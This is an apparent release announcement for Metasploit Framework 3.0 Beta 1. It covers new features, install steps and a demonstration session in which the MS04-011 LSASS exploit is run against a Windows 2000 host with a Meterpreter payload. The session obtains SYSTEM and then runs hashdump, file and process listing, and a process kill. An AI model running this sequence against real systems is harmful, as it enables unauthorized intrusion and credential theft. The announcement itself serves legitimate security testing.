We are happy to announce that the first beta release of the 3.0 tree is now ready for download. This release contains numerous bug fixes and improvements to the previous alpha release. 3.0 Beta 1 is fully compatible with Linux, BSD, Mac OS X, and Windows using our custom Cygwin installer. If you would like to discuss the beta release with other users, please subscribe to the framework-beta mailing list by sending a blank email to framework-beta-subscribe[at]metasploit.com.
If you are attending the Black Hat security conference in Las Vegas, I will be presenting on the new functionality available in this release at 4:45pm on August 2nd. This talk is part of the /dev/random track and is entitled Metasploit Reloaded.
Some quick highlights compared to version 2.6:
- All modules are organized in a directory heirarchy
- Common Meterpreter modules have been merged into 'stdapi'
- New Meterpreter features significantly help with penetration testing
- New type of "passive" exploits (browser, sniffer, ids attacks)
- Denial of service modules (ms05-035 and unpatched RRAS)
- Support for multiple shells per exploit with passive modules
- Support for recent browser bugs :-)
This release can be obtained from the Metasploit web site.
Unix users may need to install the openssl and zlib ruby modules for the
Framework to load. If you are using Ubuntu, run the following commands:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
User of other distributions or Unix flavors may want to grab the latest version of ruby from www.ruby-lang.org and build it from source.
Mac OS X users should install GNU Readline prior to rebuilding Ruby. Although it is possible to use the Framework without readline, the tab completion features in msfconsole work great and can save quite a bit of time.
Windows users will need to exit out of any running Cygwin-based applications before running the installer or using the Framework. We really tried to work with the native ruby interpreter for Windows, but numerous io/readline/stdin issues came up and we will try again once the code base gets a little more stable.
A quick demonstration of using msfconsole with meterpreter:
< metasploit >
(__) ) ||--|| *
=[ msf v3.0-beta-1
-- --=[ 86 exploits - 90 payloads
-- --=[ 16 encoders - 4 nops
=[ 4 aux
msf > use exploit/windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler..
[*] Getting OS information...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.145:41829 ->
[*] The DCERPC service did not reply to our request
Loading extension stdapi...success.
meterpreter > getuid
Server username: SYSTEM
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
meterpreter > cd c:meterpreter > ls
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 MSDOS.SYS
40777/rwxrwxrwx 0 dir Sat Oct 09 11:21:49 CDT 2004 RECYCLER
40777/rwxrwxrwx 0 dir Sat May 21 18:12:30 CDT 2005 WINNT
100666/rw-rw-rw- 195 fil Sat Oct 09 05:38:57 CDT 2004 boot.ini
100444/r--r--r-- 214416 fil Mon Dec 06 14:00:00 CST 1999 ntldr
[ snip ]
meterpreter > ps
PID Name Path
--- ---- ----
176 smss.exe \SystemRoot\System32\smss.exe
200 csrss.exe \??\C:\WINNT\system32\csrss.exe
224 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
252 services.exe C:\WINNT\system32\services.exe
264 lsass.exe C:\WINNT\system32\lsass.exe
440 svchost.exe C:\WINNT\system32\svchost.exe
[ snip ]
1804 wins.exe C:\WINNT\System32\wins.exe
2676 logon.scr C:\WINNT\system32\logon.scr
meterpreter > kill 2676